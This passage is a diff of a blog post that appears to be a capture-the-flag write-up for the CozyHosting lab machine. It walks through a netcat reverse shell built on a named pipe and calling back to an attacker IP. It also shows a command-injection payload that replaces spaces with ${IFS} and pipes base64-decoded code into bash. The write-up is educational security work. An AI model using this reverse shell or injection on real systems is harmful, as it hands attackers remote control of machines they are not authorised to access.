Kyllano/Kyllano.github.io/_posts/2024-02-13-CozyHostingWriteup.md

 ```bash
 mknod /tmp/f p
 ```

-then :
+Here we make a pipe file called `f` and the flag `p` instruct that this pipe would be a FIFO (a queue), then we do :

 ```bash
 /bin/sh 0</tmp/f | nc 10.10.14.87 12345 1>/tmp/f
 ```

+The first part, `/bin/sh 0</tmp/f`, makes it so a shell is created and takes our queue pipe as an input.
+Then whatever the shell outputs (as a results of any command) is passed to the next part of the command as input.
+The next part is waiting for the attacker's connection and writes anything coming from that connection to our pipe file.
+In a nutshell, we spawn a shell that takes our pipe file as input and then what the shell outputs is sent to our connection and when the attacker send something, it is written in our pipe thanks to `1>/tmp/f`

-The problem with all of this is that we cannot directly inject these into our username because it includes spaces and the `$Username` variable shouldn't contain spaces.
+The problem with any of this is that we cannot directly inject these into our username because it includes spaces and the `$Username` variable shouldn't contain spaces.
 In order to do this, we can replace spaces with the `${IFS}` variable.

 But in order to minimize the number of `${IFS}` variables, we might as well directly turn the payload in base64 and send it.
 If send  `;echo${IFS}"[PAYLOAD"]|base64${IFS}-d|bash;`, then it should expand to :